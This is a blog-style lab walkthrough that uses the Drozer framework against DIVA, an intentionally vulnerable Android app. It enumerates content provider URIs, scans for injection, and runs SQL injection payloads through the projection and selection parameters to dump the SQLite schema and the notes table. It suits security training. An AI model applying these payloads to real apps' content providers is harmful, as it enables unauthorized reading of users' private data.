Use Drozer To Find SQL Inject In Diva Apk

References:

Genymotion:https://www.genymotion.com/

DIVA:https://github.com/payatu/diva-androhttps://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz

Drozer:https://labs.mwrinfosecurity.com/tools/drozer/

https://github.com/mwrlabs/drozer

Download Link:

https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer_2.4.4.deb

https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4.win32.msi

https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl

https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

Document:

https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf

1.Connect to drozer server

Start drozer server in genymotion android device.

In client PC,Set adb forward port use command “adb forward tcp:31415 tcp:31415”

Start console to drozer. “drozer console connect”

Selecting 168b152501f68e9c (Genymotion Samsung Galaxy S9 8.0.0)

            ..                    ..:.
           ..o..                  .r..
            ..a..  . ....... .  ..nd
              ro..idsnemesisand..pr
              .otectorandroidsneme.
           .,sisandprotectorandroids+.
         ..nemesisandprotectorandroidsn:.
        .emesisandprotectorandroidsnemes..
      ..isandp,..,rotectorandro,..,idsnem.
      .isisandp..rotectorandroid..snemisis.
      ,andprotectorandroidsnemisisandprotec.
     .torandroidsnemesisandprotectorandroid.
     .snemisisandprotectorandroidsnemesisan:
     .dprotectorandroidsnemesisandprotector.

drozer Console (v2.4.3)
dz> help

drozer: Android Security Assessment Framework

Type `help COMMAND` for more information on a particular command, or `help
MODULE` for a particular module.

Commands:
         
cd     contributors  env   help  load    permissions  set    unset
clean  echo          exit  list  module  run          shell

Miscellaneous help topics:
                          
intents

2.Scan content uri paths.

dz> run app.package.list -f diva
jakhar.aseem.diva (Diva)
dz> run app.provider.
app.provider.columns    app.provider.download   app.provider.info       app.provider.query      app.provider.update 
app.provider.delete     app.provider.finduri    app.provider.insert     app.provider.read  
dz> run app.provider.finduri jakhar.aseem.diva
Scanning jakhar.aseem.diva...
content://jakhar.aseem.diva.provider.notesprovider/notes/
content://jakhar.aseem.diva.provider.notesprovider
content://jakhar.aseem.diva.provider.notesprovider/
content://jakhar.aseem.diva.provider.notesprovider/notes

3.Query content’s data

dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes
| _id | title    | note                                 |
| 5   | Exercise | Alternate days running               |
| 4   | Expense  | Spent too much on home theater       |
| 6   | Weekend  | b333333333333r                       |
| 3   | holiday  | Either Goa or Amsterdam              |
| 2   | home     | Buy toys for baby, Order dinner      |
| 1   | office   | 10 Meetings. 5 Calls. Lunch with CEO |

4.Scan sql inject point

Two methods will be injected,it’s projection and selection

dz> run scanner.provider.injection -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Not Vulnerable:
  content://jakhar.aseem.diva.provider.notesprovider
  content://jakhar.aseem.diva.provider.notesprovider/

Injection in Projection:
  content://jakhar.aseem.diva.provider.notesprovider/notes/
  content://jakhar.aseem.diva.provider.notesprovider/notes

Injection in Selection:
  content://jakhar.aseem.diva.provider.notesprovider/notes/
  content://jakhar.aseem.diva.provider.notesprovider/notes

5.Validate the sql inject point

dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --selection "'"
unrecognized token: "') ORDER BY title" (code 1): , while compiling: SELECT * FROM notes WHERE (') ORDER BY title
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "'"
unrecognized token: "' FROM notes ORDER BY title" (code 1): , while compiling: SELECT ' FROM notes ORDER BY title
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type  | name             | tbl_name         | rootpage | sql                                                                                                 |
| table | android_metadata | android_metadata | 3        | CREATE TABLE android_metadata (locale TEXT)                                                         |
| table | notes            | notes            | 4        | CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, note TEXT NOT NULL) |
| table | sqlite_sequence  | sqlite_sequence  | 5        | CREATE TABLE sqlite_sequence(name,seq)                                                              |
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM notes;--"
| _id | title    | note                                 |
| 1   | office   | 10 Meetings. 5 Calls. Lunch with CEO |
| 2   | home     | Buy toys for baby, Order dinner      |
| 3   | holiday  | Either Goa or Amsterdam              |
| 4   | Expense  | Spent too much on home theater       |
| 5   | Exercise | Alternate days running               |
| 6   | Weekend  | b333333333333r                       |
posted @ 2019-05-08 05:40  heycomputer  阅读(427)  评论(0编辑  收藏  举报